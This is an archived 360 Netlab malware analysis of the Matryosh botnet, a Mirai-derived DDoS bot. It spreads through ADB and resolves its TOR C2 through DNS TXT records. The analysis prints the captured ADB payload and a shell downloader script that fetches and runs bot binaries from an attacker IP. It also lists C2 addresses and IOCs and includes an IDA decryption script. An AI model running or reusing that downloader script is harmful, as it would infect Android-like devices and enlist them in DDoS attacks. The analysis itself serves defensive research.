{
	"id": "02e38fbd-5f60-41b9-a7a6-02fb76715b30",
	"created_at": "2026-04-10T03:21:56.947183Z",
	"updated_at": "2026-04-10T03:22:19.498731Z",
	"deleted_at": null,
	"sha1_hash": "e08391924149db5c47a5df61469aed28567d17c5",
	"title": "New Threat: Matryosh Botnet Is Spreading",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 576527,
	"plain_text": "New Threat: Matryosh Botnet Is Spreading\r\nBy Alex.Turing\r\nPublished: 2021-02-02 · Archived: 2026-04-10 02:40:56 UTC\r\nBackground\r\nOn January 25, 2021, the 360 netlab BotMon system labeled a suspicious ELF file as Mirai, but its network traffic did not match Mirai's characteristics. This anomaly caught our attention, and after analysis we determined that it was a new botnet that reused the Mirai framework, propagated through the ADB interface, and targeted Android-like devices with the main purpose of DDoS attacks.\r\nIt redesigns the encryption algorithm and obtains the TOR C2 and TOR proxies from remote hosts via DNS TXT records. The encryption algorithm implemented in this botnet and the process of obtaining the C2 are nested in layers, like Russian nesting dolls. For this reason we named it Matryosh.\r\nAs the analysis progresses, more details emerge. Based on the similarity of C2 instructions, we speculate that it is another attempt by the Moobot group, which is very active at the moment.\r\nMatryosh has no integrated scanning or vulnerability exploitation modules; its main function is DDoS attacks, and it supports tcpraw, icmpecho and udpplain attacks. The basic process is shown in the following figure.\r\nPropagation\r\nCurrently Matryosh is propagated via ADB. The captured payload is shown below; its main function is to download and execute scripts from the remote host 199.19.226.25.\r\nhttps://blog.netlab.360.com/matryosh-botnet-is-spreading-en/\r\nPage 1 of 11\n\nCNXN............M\r\n..¼±§±host::features=cmd,shell_v2OPENX...........iQ..°¯º±shell:cd /data/local/tmp/; rm -rf wget bwget curl bcur\r\nThe downloaded scripts are shown below; their main function is to download and execute Matryosh samples for multiple CPU architectures from the remote host.\r\n#!/bin/sh\r\nn=\"i586 mips mipsel armv5l armv7l\"\r\nhttp_server=\"199.19.226.25\"\r\nfor a in $n\r\ndo\r\n    curl http://$http_server/nXejnFjen/$a \u003e asFxgte\r\n    chmod 777 asFxgte\r\n    ./asFxgte android\r\ndone\r\nfor a in $n\r\ndo\r\n    rm $a\r\ndone\r\nSample Analysis\r\nMatryosh supports x86, ARM, MIPS and other CPU architectures. The x86 sample is selected for analysis in this paper, and its information is as follows.\r\nMD5: c96e333af964649bbc0060f436c64758\r\nELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped\r\nLib: uclibc\r\nPacker: None\r\nThe function of Matryosh is relatively simple. When it runs on an infected device, it renames its process and prints out stdin: pipe failed to confuse the user. It then decrypts the remote hostname and uses DNS TXT requests to obtain the TOR C2 and a TOR proxy, establishes a connection with the TOR proxy, and finally communicates with the TOR C2 through the proxy and waits to execute the commands sent by the C2.\r\nDecrypting sensitive resources\r\nAs can be seen in IDA, Matryosh stores sensitive resources encrypted to prevent the relevant functions from being spotted by security researchers.\r\nThe ciphertext is composed of one header and N bodies; the structure is shown below.\r\nstruct header {\r\n    u8 msg_len;\r\n    u8 key;\r\n    u8 body_cnt;\r\n}\r\nstruct body {\r\n    u8 key;\r\n    u8 body_len;\r\n    char *body_buf;\r\n}\r\nTake the ciphertext 06 29 02 DC 10 81 96 85 87 94 82 F5 D0 86 D5 D0 91 F8 FF F5 F5 FB 06 D2 11 04 00 00 00 as an example; the decryption process is shown as follows.\r\nheader.msg_len=0x06 ---\u003e valid length of the ciphertext is 6 bytes\r\nheader.key=0x29\r\nheader.body_cnt=0x2 ---\u003e 2 bodies\r\nbody1.key=0xdc\r\nbody1.len=0x10 ---\u003e length of body1 is 0x10 bytes\r\nbody1 decryption\r\nheader.key XOR body1.key = key to decrypt body1, 0xf5\r\nciphertext: 81 96 85 87 94 82 F5 D0 86 D5 D0 91 F8 FF F5 F5\r\nplaintext: 74 63 70 72 61 77 00 25 73 20 25 64 0d 0a 00 00 |tcpraw.%s %d....|\r\nbody2.key=0xfb\r\nbody2.len=0x6 ---\u003e length of body2 is 0x6 bytes\r\nbody2 decryption\r\nheader.key XOR body2.key = key to decrypt body2, 0x2f\r\nciphertext: D2 11 04 00 00 00\r\nplaintext: 00 c3 d6 d2 d2 d2 |.ÃÖÒÒÒ|\r\nThe effective ciphertext length is 6 bytes, so just take the first 6 bytes of body1 to get the plaintext tcpraw.\r\nThe decryption script in the Appendix can be used to decrypt the following list of resources, which reveals the attack methods, remote hosts and other information.\r\ntcpraw icmpecho udpplain\r\n/proc/ /cmdline stdin: pipe failed\r\nhosts.hiddenservice.xyz .hiddenservice.xyz onion.hiddenservice.xyz\r\nProcess renaming\r\nThe process is renamed to a 14-byte, case-sensitive process name to confuse the user. The actual effect is shown in the following figure.\r\nObtaining TOR proxy and TOR C2\r\nThe process by which the bot obtains the proxy and C2 can be divided into 4 steps.\r\nstep 1\r\nDecrypt to get remote host A (hosts.hiddenservice.xyz) and get its DNS TXT resolution result.\r\nhosts.hiddenservice.xyz. 1751 IN TXT \"iekfgakxorbfjcefbiyj\"\r\nstep 2\r\nDecrypt to get the remote host suffix (.hiddenservice.xyz), then extract characters from the string obtained in the first step (iekfgakxorbfjcefbiyj) according to the combination rules in the table below. Taking the first row (14,9) as an example, extract the characters at index 14 and 9 of the string and merge them to get the remote host prefix er.\r\nIndex Value\r\n14,9 er\r\n19,10 jb\r\n3,4 fg\r\n6,2 kk\r\n8,13 oc\r\n12,18 jy\r\n11,1 fe\r\n7,15 xf\r\n5,17 ai\r\n16,0 bi\r\nFinally, the prefixes and the suffix obtained above are stitched together to get the list of remote hosts B, as follows.\r\njb.hiddenservice.xyz er.hiddenservice.xyz\r\nfg.hiddenservice.xyz kk.hiddenservice.xyz\r\noc.hiddenservice.xyz jy.hiddenservice.xyz\r\nfe.hiddenservice.xyz xf.hiddenservice.xyz\r\nai.hiddenservice.xyz bi.hiddenservice.xyz\r\nThe actual network traffic in the figure below validates our analysis.\r\nstep 3\r\nRequest the DNS TXT record of each remote host B obtained in step 2 to get the addresses of the TOR proxies, up to 10.\r\noc.hiddenservice.xyz. 1799 IN TXT \"198.245.53.58:9095\"\r\nfe.hiddenservice.xyz. 1799 IN TXT \"198.27.82.186:9050\"\r\nstep 4\r\nDecrypt to get remote host C (onion.hiddenservice.xyz), request its DNS TXT record, and get the TOR C2 address.\r\nonion.hiddenservice.xyz. 1799 IN TXT \"4qhemgahbjg4j6pt.onion\"\r\nAt this point, all the basic information needed for C2 communication has been obtained, and the bot starts C2 communication.\r\nC2 Communication\r\nTo communicate with the C2, the bot first selects a TOR proxy at random and establishes a connection through the following code snippet.\r\nThe TOR C2 address and port are then sent to the TOR proxy through which it wants to communicate, where the port is hard-coded as 31337.\r\nIf the TOR proxy returns 05 00 00 01 00 00 00 00 00 00, the C2 connection is successful and subsequent communication can begin. The actual network traffic in the following figure clearly shows the above process.\r\nAfter sending the golive packet, the bot waits for the C2 to issue an instruction. The first byte of the instruction packet specifies the type of instruction.\r\nRelationship with Moobot group\r\nThe Moobot group is a fairly active botnet group that has been innovating in encryption algorithms and network communication. We exposed a new branch developed by this group, LeetHozer, on April 27, 2020. Compared with Matryosh, the similarities between the two are reflected in the following 3 aspects.\r\n1. Using a TOR C2 model\r\n2. The C2 port (31337) \u0026 attack method names are the same\r\n3. The C2 command format is highly similar\r\nBased on these considerations, we speculate that Matryosh is the new work of this parent group.\r\nConclusion\r\nMatryosh's cryptographic design has some novelty, but it still falls into the Mirai single-byte XOR pattern, which is why it is easily flagged by antivirus software as Mirai. The changes at the network communication level indicate that its authors wanted to implement a mechanism to protect the C2 by downlinking the configuration from the cloud; doing this brings some difficulties to static analysis or simple IOC simulators.\r\nHowever, putting all remote hosts under the same SLD is not optimal; it might change and we will keep an eye on it. All the related domains have been blocked by our DNSmon system.\r\nReaders are always welcome to reach us on twitter or by email to netlab at 360 dot cn.\r\nIOC\r\nSample MD5\r\nELF\r\n6d8a8772360034d811afd74721dbb261\r\n9e0734f658908139e99273f91871bdf6\r\nc96e333af964649bbc0060f436c64758\r\ne763fab020b7ad3e46a7d1d18cb85f66\r\nSCRIPT\r\n594f40a39e4f8f5324b3e198210ac7db\r\n1151cd05ee4d8e8c3266b888a9aea0f8\r\n93530c1b942293c0d5d6936820c6f6df\r\nb9d166b8e9972204ac0bbffda3f8eec6\r\nC2\r\n4qhemgahbjg4j6pt.onion:31337\r\nDownloader\r\ni586 mips mipsel armv5l armv7l\r\nhxxp://199.19.226.25/nXejnFjen/{CPU ARCH}\r\nAppendix (IDA script)\r\nimport idc\r\nimport idaapi\r\nimport idautils\r\n# c96e333af964649bbc0060f436c64758\r\n# Uses the IDA 7+ IDAPython function names; the original script used the pre-7.0 names\r\n# (PrevHead, GetMnem, GetOpnd, GetOperandValue, Byte), which newer IDA versions no longer provide.\r\ndef find_function_arg(addr):\r\n    # Walk back at most two instructions from the call site to find the\r\n    # 'mov reg, offset buf' or 'push offset buf' that passes the ciphertext pointer.\r\n    steps = 0\r\n    while steps \u003c 2:\r\n        addr = idc.prev_head(addr)\r\n        if idc.print_insn_mnem(addr) == \"mov\" and \"offset\" in idc.print_operand(addr, 1):\r\n            return idc.get_operand_value(addr, 1)\r\n        if idc.print_insn_mnem(addr) == \"push\" and \"offset\" in idc.print_operand(addr, 0):\r\n            return idc.get_operand_value(addr, 0)\r\n        steps += 1\r\n    return 0\r\ndef get_string(addr):\r\n    # Read the whole encrypted blob by walking the header and body lengths instead of\r\n    # stopping at the first NUL byte: ciphertext bodies may legitimately contain 0x00.\r\n    body_cnt = idc.get_wide_byte(addr + 2)\r\n    total = 3\r\n    for i in range(body_cnt):\r\n        total += 2 + idc.get_wide_byte(addr + total + 1)\r\n    return [idc.get_wide_byte(addr + k) for k in range(total)]\r\ndef descrypt(enc_lst):\r\n    # header: msg_len, key, body_cnt; followed by body_cnt bodies of (key, body_len, body_buf)\r\n    msg_length = enc_lst[0]\r\n    xor_key1 = enc_lst[1]\r\n    group = enc_lst[2]\r\n    msg_lst = enc_lst[3:]\r\n    des_msg = []\r\n    for i in range(0, group):\r\n        xor_key2 = msg_lst[0]\r\n        group_len = msg_lst[1]\r\n        key = xor_key1 ^ xor_key2  # per-body key = header.key XOR body.key\r\n        for j in range(2, group_len + 2):\r\n            des_msg.append(chr(msg_lst[j] ^ key))\r\n            if len(des_msg) \u003e= msg_length:\r\n                break\r\n        if len(des_msg) \u003e= msg_length:\r\n            break  # only the first msg_len plaintext bytes are meaningful\r\n        msg_lst = msg_lst[group_len + 2:]\r\n    print(\"\".join(des_msg))\r\ndescrypt_func_ea = 0x080493E0\r\nrefsto_lst = []\r\nfor ref in idautils.CodeRefsTo(descrypt_func_ea, 1):\r\n    refsto_lst.append(ref)\r\nens_str_addr = []\r\nfor ea in refsto_lst:\r\n    addr = find_function_arg(ea)\r\n    if addr != 0:\r\n        ens_str_addr.append(addr)\r\n        # print(hex(addr))\r\n    else:\r\n        print(\"Missed arg at {}\".format(hex(ea)))\r\nfor ea in ens_str_addr:\r\n    ret = get_string(ea)\r\n    descrypt(ret)\r\nSource: https://blog.netlab.360.com/matryosh-botnet-is-spreading-en/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.netlab.360.com/matryosh-botnet-is-spreading-en/"
	],
	"report_names": [
		"matryosh-botnet-is-spreading-en"
	],
	"threat_actors": [],
	"ts_created_at": 1775791316,
	"ts_updated_at": 1775791339,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/e08391924149db5c47a5df61469aed28567d17c5.pdf",
		"text": "https://archive.orkl.eu/e08391924149db5c47a5df61469aed28567d17c5.txt",
		"img": "https://archive.orkl.eu/e08391924149db5c47a5df61469aed28567d17c5.jpg"
	}
}